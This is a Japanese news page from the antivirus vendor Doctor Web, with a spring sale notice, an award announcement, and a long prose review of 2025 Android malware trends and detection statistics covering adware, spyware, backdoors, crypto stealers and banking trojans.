全てのニュース

新学期に向けて「Dr.Web Security Space」を20%OFFで提供

Wed, 01 Apr 2026 12:30:42 GMT

新年度を迎え、ご家庭でのパソコンやデジタル機器の利用が増える時期となりました。これに合わせ、当社はセキュリティソフト「Dr.Web Security Space（2台・1年ライセンス）」を通常価格より20%OFFの特別価格で提供します。

近年、学習用PCや業務用端末を狙うサイバー攻撃はますます巧妙化しています。新生活を安心してスタートするためにも、この機会にセキュリティ対策の見直しをご検討ください。

【キャンペーン概要】

対象商品：Dr.Web Security Space（2台／1年）
通常価格：3,581円（税込）
キャンペーン価格：2,865円（税込）
実施期間：4月1日（火）～4月7日（月）
特設ページ：https://www.drweb.co.jp/landing/april26/

新年度の安心・安全なデジタル環境づくりのために、ぜひこの機会をご活用ください。

PC向けセキュリティ製品「Dr.Web Security Space」、SKD AWARDSを受賞

Thu, 26 Mar 2026 13:06:16 GMT

PC向けセキュリティ製品「Dr.Web Security Space」が、SKD AWARDSにおいて再び業界賞を受賞しました。Dr.Web Security Spaceは、PC向けアンチウイルスソフト部門において最優秀製品として選出されました。

今回の受賞は、Doctor Webにとって3年連続となります。2023年には「Dr.Web Security Space for Windows 12.0」がPCセキュリティ部門で受賞し、2024年には同製品が再び最優秀賞に選ばれたほか、「Dr.Web Mobile Engine SDK」がアンチウイルスエンジン部門で受賞しました。

SKD AWARDSは、情報セキュリティ分野で知られる独立系のテスト・認証機関であるSKD Labsが毎年開催する表彰制度です。「サイバーセキュリティ製品のオスカー」とも称され、専門製品の有効性を評価する重要な指標とされています。

本アワードでは、製品は機能性、パフォーマンス、技術革新性、実環境での動作、脅威の検知力および対応能力などについて、一連のテストにより評価されます。

2025年のモバイルマルウェアレビュー

Thu, 22 Jan 2026 01:00:00 GMT

2026年1月22日

概要

2025年に最も多く検出されたAndroid向け脅威は、広告を表示させるトロイの木馬ならびに詐欺目的で使用される偽アプリとなりました。

最も多く検出された望ましくないアプリケーションは前年同様、ゲームのようなタスクを完了することで仮想報酬を得ることができるとうたうアプリでした。この報酬は現金化できるとされていますが、実際にユーザーがお金を手にすることはありません。

最も多く検出されたリスクウェアは、NP Managerツールを使用して改造されたアプリとなりました。このツールはアプリのコードを難読化して解析や検出から保護するだけでなく、改造後にデジタル署名検証を回避できるようにします。最も多く検出されたアドウェアは、ユーザーによる使用中に自動で広告リンクを開くWhatsApp Messengerの非公式改造版でした。

2025年には、さまざまなAndroidデバイスモデルのファームウェア内にマルウェアが埋め込まれる新たな事例が確認されました。Doctor Webではそのうちの1例について4月に記事を公開しています。安価なスマートフォンモデルのいくつかに、被害者から仮想通貨を盗むトロイの木馬 Android.Clipper.31 がプリインストールされていたというものです。

同じく春には、地図アプリ「AlpineQuest」の改変版に埋め込まれていたトロイの木馬 Android.Spy.1292.origin が発見されました。このマルウェアはロシアの軍関係者を標的としたサイバースパイ活動に使用されていました。

夏の終わりには人気のメッセンジャーを介して拡散されていたバックドア Android.Backdoor.916.origin について記事を公開しました。このバックドアはロシア企業の従業員をスパイして機密情報を収集することを目的としたものでした。

秋にはメッセンジャーアプリTelegram Xの改変版に埋め込まれた危険なバックドア Android.Backdoor.Baohuo.1.origin が発見されました。このマルウェアは脅威アクターが被害者のTelegramアカウントを乗っ取りユーザーに成り代わってメッセンジャーそのものを操作できるようにします。

Google Playでは2025年を通して180を超える脅威が発見され、そのダウンロード数は合計で216万5000回を超えています。それらの中にはユーザーを有料サービスに登録するさまざまなトロイの木馬や詐欺に用いられる偽アプリ、そして新たなアドウェアや望ましくないアプリが含まれていました。

2025年にもマルウェア作成者たちはAndroidマルウェアの解析を複雑化させたりアンチウイルスによる検出を回避したりするためにあらゆる手法を駆使し続けています。なかでも人気を集めている手法の1つがDEXコードをCコードに変換するというものです。さらに、マルウェアを作成する際のアプリのコード記述にAIアシスタントの助けを借りているケースもDoctor Webのウイルスアナリストによって確認されています。

2025年の主な傾向

広告を表示させるトロイの木馬が引き続き最も多く検出されたAndroid脅威となる
改造したアプリのコードを難読化し、改造後のデジタル署名検証をバイパスできるようにするツールNP Manager が多く使用されるようになる
バンキング型トロイの木馬の活動が活発化
Android デバイスのファームウェア感染に新たな事例が確認される
サイバー犯罪者はマルウェアを検出や解析から保護するために依然として従来の手法と新たな手法の両方を駆使
マルウェア作成者は悪意のあるコードの記述にAIアシスタントを積極的に活用
Google Playに新たな脅威が出現

2025年の最も注目すべきイベント

2025年4月、Doctor WebのエキスパートはAndroidデバイスユーザーから仮想通貨（暗号資産）を盗む大規模なキャンペーンを発見しました。攻撃者は中国の複数のサプライチェーンを侵害し、いくつかの低価格帯スマートフォンモデルのファームウェアにトロイの木馬 Android.Clipper.31 を仕込んでいました。 Android.Clipper.31 はメッセージングアプリWhatsAppに組み込まれており、このトロイの木馬化された改変版WhatsAppの作成には、コードに手を加えることなくアプリの動作ロジックを変更できる LSPatch ツールが使用されていました。

Android.Clipper.31 はWhatsApp内で送受信されるメッセージを傍受し、仮想通貨TronおよびEthereumのウォレットアドレス形式に一致する文字列を検出してそれらを攻撃者のアドレスに置き換えます。同時に、置き換えに気づかれることのないようユーザーに対しては正しいウォレットアドレスを表示させます。また、スクリーンショットとして保存されている、仮想通貨ウォレットへのアクセスを可能にするニーモニック（mnemonic）フレーズを見つけるためにすべての jpg、png、jpeg 画像を攻撃者に送信します。Android.Clipper.31 はWhatsAppの他にも数十のアプリに組み込まれており、これには広く使用されている仮想通貨ウォレットアプリやQRコードスキャナ、Telegramなどの他のメッセージングアプリが含まれています。改変されたこれらのアプリは悪意のあるWebサイトから拡散されていました。

2025年には、このようにAndroidデバイスのシステム領域にマルウェアがプリインストールされる事例について他にも新たなものが発見されています。その１例としてあげられるのが、悪意のあるグループによって危険なトロイの木馬 Android.Triada の新たなバージョンが複数の安価なスマートフォンのファームウェアに埋め込まれていたというものです。Android.Triada が危険な脅威とされるのは、システムのZygoteプロセスを感染させることができるためです。このプロセスはシステム内のすべてのアプリケーションの起動に直接関与しています。つまり、Zygoteプロセスを感染させることで Android.Triada はデバイス上のあらゆるアプリケーション内に侵入することができ、事実上完全にデバイスのコントロールを掌握することが可能になります。脅威アクターは Android.Triada を使用することで望ましくないアプリやアドウェアなどといった別のマルウェアをダウンロードしてインストールできるほか、被害者をスパイしたり、有料サービスに登録したりすることも可能です。そのほか、2024年にDoctor Webによって発見されたトロイの木馬 Android.Vo1d の新たな亜種が関与するAndroid TVボックスのファームウェア感染にも新たな事例が確認されました。Android.Vo1d は感染させたデバイスのシステム領域に自身のコンポーネントを置くバックドアで、攻撃者のコマンドに応じてサードパーティソフトウェアを密かにダウンロードしてインストールする機能を備えています。

同じく4月、Doctor Webのアンチウイルスラボはロシアの軍関係者を標的にスパイウェア型トロイの木馬 Android.Spy.1292.origin を拡散する攻撃キャンペーンを発見しました。脅威アクターはこのトロイの木馬を地図アプリ「AlpineQuest」の一部のバージョンに埋め込み、作成した偽のTelegramチャンネルを公式と偽ってそこから拡散していました。そのほか、ロシアのAndroidアプリ配信サイトも拡散源となっています。

攻撃者がトロイの木馬 Android.Spy.1292.origin の潜んだ悪意のある改変版「AlpineQuest」を拡散するために使用していたTelegramチャンネル

Android.Spy.1292.origin は携帯電話番号とアカウント、電話帳の連絡先、デバイスの位置情報、デバイスのメモリ内に保存されているファイルに関する情報などといった機密データをサイバー犯罪者に送信していました。また、攻撃者からコマンドを受け取った場合は特定のファイルを盗むこともできます。主に狙われていたのはユーザーがTelegramやWhatsApp経由で送信する機密文書、そしてAlpineQuestによって作成される位置情報ログファイルでした。

8月、Doctor Webは人気のメッセージングアプリのダイレクトメッセージ（DM）を使用して拡散されていたバックドア Android.Backdoor.916.origin について記事を公開しました。被害者はメッセージに添付されたAPKファイルから「アンチウイルス」をインストールするよう促されますが、実際にはこのファイルにマルウェアが潜んでいます。Doctor Webのアンチウイルスラボは2025年1月に Android.Backdoor.916.origin の最初のバージョンを発見し、それ以来その活動を監視してきました。このことが、今回の新たなキャンペーンの迅速な特定につながりました。

アンチウイルスの動作を模倣してユーザーを欺くAndroid.Backdoor.916.origin

Androidデバイスにインストールされると、Android.Backdoor.916.origin は攻撃者が機密情報を窃取しユーザーをスパイすることを可能にします（会話を盗聴する、デバイスのカメラからブロードキャストする、位置情報を追跡する、メッセンジャーやブラウザから内容を盗むなど）。さらに、Android.Backdoor.916.origin はキーロガー機能も備えており、入力されたテキスト（パスワードなど）を傍受します。このバックドアは不特定のAndroidユーザー間での大量拡散を狙ったものではなく標的型攻撃を目的に設計されているものと考えられ、その主たる標的はロシア企業の従業員でした。

10月、Doctor WebはメッセンジャーアプリTelegram Xの改変版に潜む多機能バックドア Android.Backdoor.Baohuo.1.origin を発見しました。主な拡散源はユーザーがアプリ内広告からリダイレクトされる悪意のあるWebサイトです。これらのサイトでユーザーはチャットやデートの相手を見つけるための便利なアプリとして紹介されているTelegram Xをインストールするよう勧められます。標的とされていたのは主にブラジルとインドネシアのユーザーでした。拡散源は悪意のあるサイトだけではなく、サードパーティアプリストアでも Android.Backdoor.Baohuo.1.origin が検出されています。

トロイの木馬化されたバージョンのTelegram Xがダウンロードされていた悪意のあるサイトの1つ

Android.Backdoor.Baohuo.1.origin の実行するタスクの1つが機密データの窃取で、被害者のTelegramアカウントからログインIDとパスワード、チャット履歴、着信SMS、電話帳の連絡先を盗むほか、クリップボードの内容を傍受します。しかしながら、Android.Backdoor.Baohuo.1.origin は単にスパイウェアとして機能するだけではありません。Android.Backdoor.Baohuo.1.origin を使用することで脅威アクターはハッキングしたアカウントとメッセンジャー自体の両方を乗っ取り、さまざまな操作を実行することが可能です。たとえば、ユーザーを密かにTelegramチャンネルに追加・削除したり、ユーザーに成り代わってチャットへの参加・退出を行ったり、アカウントの認証済みデバイスを非表示にしたりできます。Telegram Xの動作ロジックを変更する必要のあるアクションを実行する場合には、Xposedフレームワークが使用されます。バックドアの操作には従来の方法であるC2サーバー経由に加え、これまでAndroidマルウェアでは例を見ないRedisデータベース経由でのコマンド送信が使用されています。合計で58,000台を超えるデバイスが Android.Backdoor.Baohuo.1.origin に感染しており、これにはおよそ3千の異なるモデルのスマートフォンやタブレット、TVボックスセット、そしてAndroidベースの車載OSを搭載した自動車が含まれていました。

Android.Backdoor.Baohuo.1.origin に感染したデバイス数の多い国

統計

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年に最も多く検出されたAndroid脅威はさまざまな悪意のあるプログラムで、検出された脅威全体の81.11%を占めました。次いでリスクウェアが10.73%を占めて2位となり、アドウェアが5.89%を占めて3位につけました。最も検出数の少なかったのは望ましくないアプリで、2.27%を占めて最下位となっています。

2024年比での全検出数に占める割合は、悪意のあるプログラムとリスクウェアで増加し、望ましくないアプリとアドウェアでは減少しています。

以下のグラフは、脅威の内訳を種類別に表したものです。

悪意のあるプログラム

最も多く検出されたマルウェアの座はここ数年にわたって Android.HiddenAds ファミリーに属する広告を表示するトロイの木馬が占めており、2025年にもこの状況に変化はみられませんでした。ただし、マルウェア検出数全体に占める Android.HiddenAds の割合は31.95%から27.42%へとわずかに減少しています。

これらトロイの木馬は全画面（フルスクリーン）バナーや動画という形で迷惑な広告を表示させます。また、ユーザーによる検出や削除から逃れるため、インストールされた後に自身の存在を隠そうとします（ホーム画面の自身のアイコンを隠したり置き換えたりするなど）。

Android.HiddenAds ファミリーの中で最も多く検出されたのは Android.HiddenAds.657.origin で、同ファミリー検出数全体の3分の1以上を占めています。このトロイの木馬は2021年から知られている Android.HiddenAds.1994 の数ある亜種の1つで、2024年にDoctor Webウイルスアナリストの目を引き、2025年ついにトップに躍り出ました。2025年には Android.HiddenAds.666.origin や Android.HiddenAds.673.origin など、Android.HiddenAds.1994 の新たな亜種もいくつか拡散されています。他の亜種がそうであったように、これらの亜種もいずれ上位に進出してくる可能性があります。

Android.HiddenAds のサブファミリーであるAegisも引き続き検出されていますが、ファミリー検出数全体に占める割合は17.37%から3.11%へと大幅に減少しています。これらトロイの木馬はインストール後自動的に起動することができます。最も多く検出された亜種は Android.HiddenAds.Aegis.1 と Android.HiddenAds.Aegis.8.origin でした。

2番目に多く検出されたマルウェアはアドウェア型トロイの木馬 Android.MobiDash で、マルウェア検出数全体に占める割合は5.38%から15.64%に増加しました。最も多く検出された亜種は Android.MobiDash.7859 となっています。3番目に多く検出されたマルウェアは、サイバー犯罪者によってさまざまな詐欺スキームに用いられる偽アプリ Android.FakeApp でした。Android.FakeApp はうたわれた機能を実行する代わりにさまざまなサイトを開きます。マルウェア検出数全体に占める割合は2024年の18.28%から減少し10.94%となりました。この減少の一因となっているのが、オンラインカジノのサイトを開くことを主な目的としたトロイの木馬 Android.FakeApp.1600 の活動低下です。ただし、この Android.FakeApp.1600 は依然として Android.FakeApp ファミリーの中で最も多く拡散されている亜種となっています。

多様なスパイウェア機能を備えたトロイの木馬 Android.Spy ファミリーの、マルウェア検出数全体に占める割合は11.52%から3.09%へと減少しました。一方、バンキング型トロイの木馬の活動は増加し、その検出数が占める割合は6.29%から6.94%に増加しています。

マルウェアを検出や解析から保護するために使用されるソフトウェアパッカーの検出数は5.49%から6.01%へと増加しました。最も多く検出されたのは Android.Packed.57146 でパックされた悪意のあるアプリでした。

WhatsApp MessengerのさまざまなMod（改造版）も多く拡散され、その中にはユーザーに気づかれず密かにWebサイトを開くという亜種もありました（Dr.Webによって Android.Click.1812 として検出）。多機能トロイの木馬 Android.Triada ファミリーの活動も増加し、2.74%から7.48%となりました。これはサイバー犯罪者によってAndroidデバイスのファームウェアに埋め込まれるトロイの木馬です。

以下のグラフは2025年に最も多く検出された上位10のマルウェアです。

Android.HiddenAds.657.origin
Android.HiddenAds.4214
Android.HiddenAds.655.origin
Android.HiddenAds.4213
Android.HiddenAds.666.origin: 迷惑な広告を表示するよう設計されたトロイの木馬です。無害でポピュラーなアプリを装って拡散されることが多く、別のマルウェアによってシステムディレクトリ内にインストールされる場合もあります。通常、これらのトロイの木馬はAndroidデバイス上に侵入すると自らの存在をユーザーから隠そうとします（ホーム画面からアイコンを「隠す」など）。
Android.MobiDash.7859: 迷惑な広告を表示させるトロイの木馬です。開発者によってアプリケーション内に埋め込まれる特殊なソフトウェアモジュールです。
Android.FakeApp.1600: 設定にハードコードされたWebサイトを開くトロイの木馬アプリです。既知の亜種ではオンラインカジノのサイトが開かれます。
Android.Click.1812: さまざまなWebサイトをバックグラウンドで密かに読み込むことができる、悪意のあるWhatsApp Messenger Mod（改造版）の検出名です。
Android.Packed.57146: 一般的な商用のコード難読化ツールを使用してパックされた悪意のあるアプリの検出名です。
Android.Triada.5847: Android.Triada トロイの木馬を検出や解析から保護するよう設計されたパッカーの検出名です。多くの場合、このパッカーは Android.Triada が埋め込まれた悪意のあるTelegramメッセンジャーMod（改造版）と一緒に用いられます。

望ましくないアプリケーション

2025年に最も多く検出された望ましくないアプリケーションは51.96%を占めて再び Program.FakeMoney.11 となりました。これらはさまざまなタスクを完了することで仮想報酬を得ることができるとうたうアプリです。この報酬は現金化できるとされていますが、実際にはユーザーがお金を受け取ることはありません。同様のアプリである Program.FakeMoney.14 や Program.FakeMoney.16 も広く拡散されましたが、その検出数ははるかに少ないものとなっています。

アンチウイルスの動作を模倣して存在しない脅威の検出を通知し、検出された問題を「修復」するために製品の完全版を購入するよう促すアプリ Program.FakeAntiVirus.1 が10.37%を占めて2位につけました。

3位となったのはクラウドサービスCloudInjectを使用して改造されたアプリケーション Program.CloudInject.1 で、6.41%を占めています。その亜種である Program.CloudInject.5 が5.08%を占めて Program.CloudInject.1 に迫り、4位となりました。これらのアプリケーションの改造はリモートサーバー上で直接行われます。CloudInjectサービスへのアクセスはユーティリティTool.CloudInject によって提供されますが、これはCloudInjectサービスを使用するためのシェルにすぎません。アプリケーションには改造過程で危険な権限や難読化されたコードが追加され、そのうえ、改造後のアプリは改造者がCloudInjectサービスを介してリモートで管理できるようになります（アプリをロックし、使用を継続するためにコード入力を要求するなど）。

ユーザーを監視し、そのアクティビティをコントロールするために使用できるアプリの検出数はわずかに増加しています。こうしたアプリは悪意のあるアクターが手にした途端にスパイウェアと化します。Program.TrackView.1.origin とその亜種である Program.TrackView.2.origin はそれぞれ2.40%から2.91%、0.21%から0.97%へと増加しました。Program.SecretVideoRecorder.1.origin は2.03%から2.56%、その亜種である Program.SecretVideoRecorder.2.origin —は0.90%から1.02%に増加し、そして Program.SnoopPhone.1.origin は0.31%から1.01%に増加しています。

以下のグラフは2025年に最も多く検出された上位10の望ましくないアプリケーションです。

Program.FakeMoney.11
Program.FakeMoney.14: さまざまなタスクを完了することでお金を稼ぐことができるとうたうAndroidアプリケーションの検出名です。このアプリはタスクが完了するたびに報酬が貯まっていくかのように見せかけます。「稼いだ」お金を引き出すために（多くの場合、一般的に広く使用されている支払いシステムや銀行を指定されます）、ユーザーは一定の金額を貯める必要があるとされていますが、たとえその金額が貯まったとしても実際にお金を手にすることはできません。このウイルスレコードは、そのようなアプリのソースコードを基に作成された他の望ましくないソフトウェアの検出にも使用されます。
Program.FakeAntiVirus.1: アンチウイルスソフトウェアを模倣するアドウェアアプリケーションの検出名です。これらのアプリは存在しない脅威について偽の通知をすることでユーザーを騙し、ソフトウェアの完全版を購入するよう要求します。
Program.CloudInject.1
Program.CloudInject.5: クラウドサービスCloudInjectと、同名のAndroidユーティリティ（Tool.CloudInject としてDr.Webウイルスデータベースに追加されています）を使用して改造されたAndroidアプリケーションの検出名です。アプリケーションはリモートサーバー上で改造されますが、その際、改造者はアプリに何が追加されるのか具体的な改造内容をコントロールすることができません。また、これらのアプリケーションは危険なシステム権限を複数要求します。改造後のアプリは改造者がリモートで管理できるようになります（アプリをブロックする、カスタムダイアログを表示する、他のソフトウェアのインストールや削除を追跡するなど）。
Program.TrackView.1.origin
Program.TrackView.2.origin: Androidデバイスを通じてユーザーを監視できるようにするアプリケーションの検出名です。このアプリを使用することで、悪意のあるアクターがデバイスの位置を追跡したり、カメラで動画や写真を撮ったり、マイクで周囲の音を聞いたり、音声を録音したりすることが可能になります。
Program.SecretVideoRecorder.1.origin
Program.SecretVideoRecorder.2.origin: Androidデバイスの内蔵カメラを使用して周囲の動画や写真を撮影するよう設計されたアプリケーションの、さまざまな亜種の検出名です。撮影中であることを知らせる通知を無効にしたり、アプリのアイコンと表示名を偽のものに置き換えたりすることができ、密かに動作することが可能です。これらの機能により、潜在的に危険なソフトウェアとみなされます。
Program.SnoopPhone.1.origin: Androidユーザーのアクティビティを監視するよう設計されたアプリケーションです。このアプリを使用することで、第三者がSMSを読む、通話に関する情報を収集する、デバイスの位置を追跡する、周囲の音声を録音することが可能になります。

リスクウェア

2025年に最も多く検出されたリスクウェアは、NP Managerユーティリティを使用して改造されたアプリとなりました。NP Managerはアプリを改造するために設計されたツールで、アプリのコードを難読化して保護するためのモジュールや、改造後にデジタル署名検証をすり抜けるためのモジュールが実装されています。多くの場合、脅威アクターは悪意のあるアプリケーションを保護しアンチウイルスによる検出をより困難なものにするためにこのツールを使用します。これらアプリの検出数は2024年の24.52%から53.59%へと増加し、2025年にはリスクウェア検出数全体の半数以上を占めています。最も多く検出された亜種は Tool.NPMod.3（32.85%）、Tool.NPMod.1（12.61%）、Tool.NPMod.1.origin（3.02%）、Tool.NPMod.4（2.31%）でした。

プログラミング言語Luaを使用してAndroidアプリを開発するためのフレームワークである Tool.Androlua の検出数は3.93%から8.11%に増加しました。このようなフレームワークはアクセシビリティサービス（ユーザー補助機能）の使用を含む多くのシステム権限を要求します。Tool.Androlua フレームワークを使用して作成されたアプリは、実行直前に復号化される暗号化されたLuaスクリプトをベースにしており、こうしたスクリプトは悪意のあるものとなりえます。ツール Tool.LuckyPatcher を使用して改造されたアプリの検出数も8.16%から10.06%に増加しています。このツールは特別なスクリプトをインターネットからダウンロードすることにより、Androidデバイスにインストールされているアプリを改変します。

一方、Androidアプリをインストールせずに実行できるようにするユーティリティ Tool.SilentInstaller は33.10%から10.55%に減少しました。最も多く検出された亜種は Tool.SilentInstaller.14.origin（4.66%）、Tool.SilentInstaller.6.origin（2.07%）、Tool.SilentInstaller.7.origin（1.88%）となっています。また、パッカーTool.Packer.1.origin によって保護されたアプリの検出数も13.17%から2.58%へと減少しています。

以下のグラフは2025年に最も多く検出された上位10のリスクウェアです。

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin
Tool.NPMod.4: NP Managerユーティリティを使用して改造されたAndroidアプリの検出名です。NP Managerにはアプリのコードを難読化して保護するためのモジュールや、改造後にデジタル署名の検証をバイパスするためのモジュールが実装されています。多くの場合、難読化はマルウェアの検出や解析をより困難にする目的で行われます。
Tool.Androlua.1.origin: スクリプト言語Luaを使用してAndroidアプリを開発するための特別なフレームワークの、潜在的に危険なバージョンの検出名です。Luaベースアプリの主なロジックは、実行時に対応するスクリプトがインタプリタによって暗号化・復号化されるというものです。多くの場合、このフレームワークは動作するためにデフォルトで多数のシステム権限へのアクセスを要求します。その結果、フレームワークが実行するLuaスクリプトによって、取得した権限に応じたさまざまな悪意のある動作が実行される可能性があります。
Tool.LuckyPatcher.2.origin
Tool.LuckyPatcher.1.origin: Androidデバイスにインストールされたアプリを改変できるようにする（パッチを作成する）ツールです。アプリの動作ロジックを変更したり特定の制限を回避したりする目的で使用されます。たとえば、ユーザーはこのツールを使用することで、バンキングアプリのルートアクセス検証を無効にしたり、ゲーム内で無限のリソースを取得したりできます。パッチを追加するために、このユーティリティは特別に作成されたスクリプトをインターネットからダウンロードしますが、このスクリプトは誰でも作成して共通のデータベースに追加することができます。そのようなスクリプトの機能が悪意のあるものである場合もあることから、このツールを使用して作成されたパッチは潜在的な脅威となる可能性があります。
Tool.SilentInstaller.14.origin: アプリケーションがAPKファイルをインストールせずに実行できるようにする、リスクウェアプラットフォームです。埋め込まれているアプリのコンテキスト内で仮想ランタイム環境を作成します。これらのプラットフォームを使用して起動されたAPKファイルは、アプリの一部であるかのように動作し、アプリと同じ権限を取得します。
Tool.Packer.1.origin: Androidアプリケーションを不正な改変やリバースエンジニアリングから保護するよう設計されたパッカーツールです。このツール自体は悪意のあるものではありませんが、無害なアプリケーションだけでなく悪意のあるアプリケーションを保護するために使用される可能性があります。

アドウェア

2025年に最も多く検出されたアドウェアは、Adware.ModAd.1 として検出されるWhatsApp MessengerのMod（改造版）でした。この改造版には使用中にリンクを開く機能が追加されており、ユーザーはそれらのリンクから広告サイトへとリダイレクトされます。アドウェア検出数全体に占める Adware.ModAd.1 の割合は2024年の47.45%から26.90%に減少しています。

Androidアプリに組み込まれて広告を含んだ通知を表示させるモジュール Adware.Adpush が、14.76%から26.19%へとシェアを伸ばして2位にランクインしました。3位となったのは2024年とほぼ変わらず8.88%を占めた Adware.Basement ファミリーです。Adware.Basement は悪意のあるサイトにつながる広告を表示させます。

そのほか、Adware.Airpush（4.35%から5.14%に増加）、Adware.Fictus（3.29%から6.21%に増加）、Adware.Youmi（1.62%から2.91%に増加）、Adware.Leadbolt（2.26%から2.41%に増加）、Adware.Jiubang（1.70%から2.38%に増加）ファミリーに属するアドウェアも多く検出されています。

以下のグラフは2025年に最も多く検出された上位10のアドウェアです。

Adware.ModAd.1: その機能に特定のコードが挿入されている、WhatsApp MessengerのMod（改造版）です。このコードはメッセンジャーの動作中にWebコンテンツを表示（Android WebViewコンポーネントを使用して）させることで目的のURLをロードします。これらのURLから、オンラインカジノやブックメーカー、アダルトサイトなどの広告サイトへのリダイレクトが実行されます。
Adware.AdPush.3.origin
Adware.Adpush.21846
Adware.AdPush.39.origin: Androidアプリに組み込まれ、さまざまな広告を表示するアドウェアモジュールのファミリーです。表示されるものはモジュールのバージョンや亜種によって異なり、広告を含む通知やポップアップウィンドウ、バナーなどがあります。多くの場合、攻撃者はユーザーにさまざまなソフトウェアをインストールするよう促してマルウェアを拡散させる目的で、これらのモジュールを使用しています。さらに、これらモジュールは個人情報を収集してリモートサーバーに送信します。
Adware.Basement.1: 迷惑な広告を表示するアプリです。多くの場合、それらの広告は悪意のあるサイトや詐欺サイトにつながっています。このアプリには望ましくないアプリ Program.FakeMoney.11 と同じコードベースが使用されています。
Adware.Fictus.1.origin: 人気のAndroid アプリやゲームのクローンバージョンに組み込まれるアドウェアモジュールで、その際にnet2shareパッカーが使用されます。この方法で作成されたアプリのコピーはさまざまな配信ストアから拡散され、Androidデバイス上にインストールされると迷惑な広告を表示します。
Adware.Airpush.7.origin: Androidアプリに組み込まれ、さまざまな広告を表示するアドウェアモジュールのファミリーです。表示されるものはモジュールのバージョンや亜種によって異なり、広告を含む通知やポップアップウィンドウ、バナーなどがあります。多くの場合、攻撃者はユーザーにさまざまなソフトウェアをインストールするよう促してマルウェアを拡散させる目的で、これらのモジュールを使用しています。さらに、これらモジュールは個人情報を収集してリモートサーバーに送信します。
Adware.Youmi.4: Androidデバイスのホーム画面に広告ショートカットを追加する、望ましくないアドウェアモジュールの検出名です。
Adware.Jiubang.1: Androidデバイス向けの望ましくないアドウェアで、アプリケーションのインストール時に特定のプログラムを宣伝するバナーを表示させます。
Adware.Inmobi.1: InmobiのアドウェアSDKの一部バージョンの検出名です。電話をかけたり、Android デバイスのカレンダーにイベントを追加したりできます。

Google Play上の脅威

2025年、Doctor WebのアンチウイルスラボはGoogle Playで180を超える悪意のあるアプリ、望ましくないアプリ、アドウェアアプリを発見しました。これらのアプリは合計で216万5040回以上ダウンロードされています。その中には、感染させたデバイス上で自身の存在を隠し、システムインターフェースや他のプログラムの上に重ねて広告を表示させるトロイの木馬 Android.HiddenAds.4213 と Android.HiddenAds.4215 のさまざまな亜種が含まれており、画像編集ツールや写真・動画を撮影するためのカメラアプリなどを装って拡散されていました。

アプリ「Time Shift Cam」と「Fusion Collage Editor」は Android.HiddenAds ファミリーに属するアドウェア型トロイの木馬だった

仮想通貨を盗むよう設計されたトロイの木馬 Android.CoinSteal.202、Android.CoinSteal.203、Android.CoinSteal.206 も発見されています。これらは仮想通貨取引所Dydxの公式アプリや、ブロックチェーンプラットフォームRaydiumとAerodrome Financeの公式アプリを装って拡散されていました。

「Raydium」と「Dydx Exchange」に偽装した、仮想通貨を盗むトロイの木馬

これら悪意のあるアプリは、起動されると仮想通貨ウォレットにアクセスするためと称してニーモニックフレーズを入力するようユーザーに求めます。実際には、入力されたデータは攻撃者に送信されます。なかには、別の仮想通貨プラットフォームからの要求を装った入力フォームが表示される場合もありました。

仮想通貨取引所PancakeSwapを装ったフィッシングフォームを表示させ、仮想通貨ウォレットにアクセスするためのニーモニックフレーズを入力するようユーザーに要求する Android.CoinSteal.206

2025年を通して、80を超える悪意のある Android.Joker アプリが発見されています。これらはユーザーを有料サービスに登録するトロイの木馬で、メッセンジャーや写真アプリ、システムツール、画像編集アプリ、ドキュメント管理アプリなどといったさまざまなアプリを装って拡散されていました。

発見された Android.Joker トロイの木馬の例：Android.Joker.2494 はメッセンジャー「File Text Messages」を装って拡散され、Android.Joker.2496 はスマートフォンの動作を最適化するユーティリティ「Useful Cleaner」に偽装していた

さまざまな詐欺スキームに用いられる Android.FakeApp 偽アプリも引き続きあらゆるものが拡散されています。これらトロイの木馬の主な目的はWebサイトを開くことです。その一部は金融関連アプリに偽装して、フィッシングサイトや、投資またはオンライン収入関連を装った詐欺サイトを開きます。また別の一部はゲームを装って拡散されていました。このタイプの Android.FakeApp は特定の条件下でゲームとして機能する代わりにオンラインカジノやブックメーカーのサイトを開く場合があります。Google Playでは100を超えるそのようなアプリが発見されています。

Android.FakeApp 偽アプリの例：トルコのユーザーを標的とした預金や収入を管理できるとうたうアプリ「TPAO」に潜んだトロイの木馬 Android.FakeApp.1863 と、ゲーム「Pino Bounce」を装って拡散されオンラインカジノのサイトを開く場合のあるトロイの木馬 Android.FakeApp.1840

新たなアドウェアもDoctor Webのウイルスアナリストによって発見されています。Adware.Adpush.21912 と名づけられたアドウェアは仮想通貨に関する情報を提供するアプリ「Coin News Promax」に隠されていました。 Adware.Adpush.21912 は通知を表示させ、その通知がクリックされるとС2サーバーによって指定されたリンクをWebView内で開きます。

Google Playで提供されているアプリ「Coin News Promax」にはアドウェア Adware.Adpush.21912 が潜んでいた

そのほか、望ましくないアプリケーション Program.FakeMoney.16 も発見されました。Program.FakeMoney.16 は「Zeus Jackpot Mania」というアプリを装って拡散されており、このアプリでユーザーはゲームをプレイして仮想報酬を獲得し、現金化して引き出すことができるとされています。

「Zeus Jackpot Mania」は望ましくないアプリケーション Program.FakeMoney.16 だった

ユーザーは現金を「引き出す」ためにいくつか情報を提供するよう要求されますが、最終的にお金を受け取ることはありません。

ユーザーに氏名と銀行口座情報を提供するよう求める Program.FakeMoney.16

バンキング型トロイの木馬

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年に検出されたバンキング型トロイの木馬のマルウェア検出数全体に占める割合は2024年の6.29%をわずかに上回る6.94%となりました。その活動は第1四半期を通じてほぼ横ばいで推移しましたが、第2四半期の初めには大幅な増加がみられました。その後は緩やかに減少に転じ、7月に年間最低数を記録しています。8月を境に再び増加に転じ、10月にピークに達した後、2025年の終わりには再び減少が確認されています。

2025年にも、よく知られたバンキング型トロイの木馬のファミリーが再び攻撃に使用されました。なかでも活発に拡散されていたのが、Android.Banker.Mamont、Coper、Android.BankBot.Ermac などです。そのほか、NGate トロイの木馬の新たなバージョンも発見されています。これはNFC技術を悪用して金銭を窃取するトロイの木馬で、感染させたデバイスのNFCチップからデータを攻撃者に送信することにより、ATMで被害者の口座から勝手にお金を引き出したり、非接触型決済（タッチ決済）で被害者の関与なしに不正に支払いを行ったりできるようにします。最も多く検出された亜種は、Android.Banker.NGate.8、Android.Banker.NGate.17、Android.Banker.NGate.5.origin でした。

